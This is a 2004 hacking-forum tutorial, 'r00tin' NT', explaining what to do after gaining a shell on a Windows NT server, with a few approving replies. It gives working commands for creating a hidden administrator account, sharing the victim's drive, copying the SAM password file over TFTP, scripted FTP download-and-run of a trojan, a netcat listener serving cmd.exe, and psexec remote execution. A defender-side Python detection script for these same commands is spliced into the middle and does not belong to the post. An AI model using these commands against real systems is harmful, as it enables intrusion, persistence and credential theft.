So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt' and you don't know what the (filtered) a command prompt is cuz you don't know shit about DOS and can't do anything without a pretty point-n-click GUI interface, and you need to get your UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.
+++ r00tin' NT +++

0x01. The Basics
  + What are net commands?
  + What are some net commands?
  + What is NetBIOS?
  + Creating a local admin account.
  + How to transfer files to and from.
  + How do I execute those files remotely?
0x01. The Basics - What are net commands?
`````````````````````````````````````````
What are net commands exactly? Net commands are commands used to show information about a server or network, which can include information on the servers, networks, shares, and connections. Other net commands let you edit user accounts, groups, and other configuration types.
0x01. The Basics - What are some net commands?
``````````````````````````````````````````````
What are some net commands? There are various net commands which you can use to view server info. Some of these would include the ever popular NET use, NET share and NET view. But these aren't the only net commands available. There is a wide variety of net commands and they are as follows:

  - NET Accounts
  - NET Computer
  - NET Config Server
  - NET Config Workstation
  - NET Continue
  - NET File
  - NET Group
  - NET Help
  - NET Helpmsg
  - NET Localgroup
  - NET Name
  - NET Pause
  - NET Print
  - NET Send
  - NET Session
  - NET Share
  - NET Statistics Server
  - NET Statistics Workstation
  - NET Stop
  - NET Time
  - NET Use
  - NET User
  - NET Ver
  - NET View
Net commands are great ways to spy on hacked Windows NT servers because you're checking on the network's status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use, because they each do a certain thing which can be used for attacking: NET View is used to display a list of resources being shared on the attacked computer; NET Share displays a list of information about all the resources that are being shared on the attacked computer and can also be used to create network shares; and last but not least, NET Use displays a list of connected computers and also has options for connecting and disconnecting from previously made shares. With those 3 commands, you have the ability to do an attack called NetBIOS hacking.
0x01. The Basics - Creating a local admin account.
``````````````````````````````````````````````````
First off, I always start off with making myself an admin on the computer just in case the shell is lost.

Add your name to the admin group:

  net user [username] [password] /add
  net localgroup administrators [username] /add

  ( C:\WINNT\System32>net user GOD 0wned /add )
  ( C:\WINNT\System32>net localgroup administrators GOD /add )
0x01. The Basics - How to transfer files to and from.
`````````````````````````````````````````````````````
Now's a good time to transfer some files :) Here are some good methods of transferring files that I use:
1. Open the C: drive up for file sharing/transferring:

     C:\>NET SHARE shareME=C:

   which you can connect to in your browser window:

     \\victimsIP\shareME

   or type in YOUR dos prompt:

     c:\>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (you need to have a TFTP server running on your computer)
   http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/

     TFTP [-i] YOURIP [GET | PUT] source [destination]

     C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. From a command prompt, echo ftp commands into a .bat file and execute it:

     echo user <USERNAME> >>c:\$.tmp
     echo <PASSWORD> >>c:\$.tmp
     echo lcd c:\windows >>c:\$.tmp
     echo binary >>c:\$.tmp
     echo get <FILENAME.EXE> >>c:\$.tmp
     echo quit >>c:\$.tmp
     ftp -v -i -n -s:c:\$.tmp <FTP SITE> >c:\$$.tmp
     <FILENAME.EXE>
     del c:\$.tmp
     del c:\$$.tmp
4. I have created a commandline webdownloader which allows you to grab a file from a website and execute it. It's more reliable when transferring files (ftp servers have timeouts, TFTP uses UDP packets so it fails a lot):
   http://illmob.org/stuff/cmdget.zip

   You need to get it onto the server using the above choices, then you can use it normally:

     cmdget http://blah.com/trojan.exe c:\0wned.exe

   "Well, how would I get your exe onto the hacked server, illwill, you dumbass?" you might ask. Well, you could use this program brainbuster made... basically it's a GUI front-end to create a debug script that you can paste into a shell line by line, which will create a bat file that will re-compile the script into an .exe:
   http://illmob.org/stuff/exe2txt.zip
*** Added from 101 on GSO forums 5/31/04 ***

A small tip now if you wanna use SecureCRT in listening mode to be able then to copy/paste the huge .txt without problems:

-*example*-
your local IP = 192.168.0.2

Run a listening netcat1:

  nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2

With SecureCRT, do a simple telnet connection to 192.168.0.2:12345 (you'll have a shell, of course, on your own computer through SecureCRT). Now open another listening netcat2 through this local sCRT shell; you'll finally be able to copy/paste this huge txt if a victim spawns a shell to this netcat2.
*****
* I would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it, like file transfers. You would start nc listening on a port and then on your computer:

  c:\>nc (vic_ip) (vic_port) < file.exe
*** Added from 7/06/04 ***

Method #1: http download with one paste
-------------------- SNIP----------------------

Method #2: ftp downloading with one paste
Change ftp.blah.com to your own ftp+dir and add your username/pass.
-------------------- SNIP----------------------
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com >c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
------------------END SNIP----------------------
0x01. The Basics - How do I execute those files remotely?
`````````````````````````````````````````````````````````
Having trouble trying to execute files remotely? Try PSEXEC:
http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/

  psexec -u [username] -p [password] [command]

If I created a user "GOD" with the password "0wn3d":

  C:\>psexec -u GOD -p 0wn3d blah.exe

or if you wanna have their TFTP connect back to you and retrieve a file:

  c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
NOTE: Psexec will only work if you add an administrator user first, and if the computer doesn't have remote administration disabled, or one of the ports firewalled off.

Or try Remoxec:
http://securityfriday.com/ToolDownload/Remoxec/remoxec_doc.html
Remoxec executes a program using DCOM. Just supply an IP, USER, PASS, and the EXE you wanna execute.
This is a working textfile that I have been kicking around; I'll keep adding to it sooner or later when I get some more time.
-peace illwill
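As an added, defender-side example (not part of illwill's post), here is a small detection pass over constructed Windows process-creation log lines for the exact command patterns this post walks through: the two-step local admin creation, sharing a drive root, TFTP/FTP scripted transfers, and psexec with embedded credentials. The host names, timestamps, IP, and the "host|time|command line" layout are assumptions made for the sample; the command lines themselves are the ones shown above.

```python
import re
from collections import defaultdict

# Constructed process-creation records (Windows Event ID 4688 style), flattened
# to "host|time|command line" for this example. Not real log data.
SAMPLE_LOG = """\
SRV1|2004-07-11T11:50:03|net user GOD 0wned /add
SRV1|2004-07-11T11:50:09|net localgroup administrators GOD /add
SRV1|2004-07-11T11:51:30|net share shareME=C:
SRV1|2004-07-11T11:52:10|tftp -i 10.0.0.5 GET SAM c:\\rootedSAMS
SRV1|2004-07-11T11:53:00|ftp -v -i -n -s:c:\\$.tmp ftp.blah.com
WS7|2004-07-11T12:00:00|net view \\\\FILESRV
WS7|2004-07-11T12:01:00|psexec -u GOD -p 0wn3d blah.exe
"""

# (rule name, regex over the command line); case-insensitive because cmd.exe is.
RULES = [
    ("local_account_created", re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added_to_administrators", re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("drive_root_shared", re.compile(r"\bnet\s+share\s+\S+=[a-z]:\\?\s*$", re.I)),
    ("tftp_binary_transfer", re.compile(r"\btftp(\.exe)?\s+-i\b.*\b(get|put)\b", re.I)),
    ("ftp_scripted_session", re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("psexec_with_credentials", re.compile(r"\bpsexec(\.exe)?\b.*\s-u\s+\S+.*\s-p\s+", re.I)),
]

def scan(log_text):
    """Return (findings, chained_hosts): findings is a list of (host, rule, cmd);
    chained_hosts are hosts where 'net user X ... /add' was followed by
    'net localgroup administrators X /add' for the same X (admin planted)."""
    findings = []
    created = defaultdict(set)  # host -> account names created with net user /add
    chained = set()
    for raw in filter(str.strip, log_text.splitlines()):
        host, _ts, cmd = raw.split("|", 2)
        for name, rx in RULES:
            if not rx.search(cmd):
                continue
            findings.append((host, name, cmd))
            if name == "local_account_created":
                created[host].add(cmd.split()[2].lower())
            elif name == "added_to_administrators" and cmd.split()[3].lower() in created[host]:
                chained.add(host)  # same account, same host: full chain observed
    return findings, chained
```

Plain `net view` is deliberately not a rule, since on its own it is ordinary admin activity; the value is in the chain and in the transfer/exec patterns that follow it.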
Paul
Jul 11 2004, 11:56 AM
Gonna give ppl this tut if they ask me. Nice one illwill
chris105
Jul 11 2004, 12:10 PM
Yeah, it's a good framework which I'm sure, if you find time, you will be able to build upon.
Just one bone to pick: WHY r00t WHY! WHY! WHY! Please use root cos r00t makes you look like a prick.
Other than that, well done.
linuxwolf
Jul 11 2004, 09:52 PM
haha, well said. nice one ill. now we wait for the grammatically challenged replies.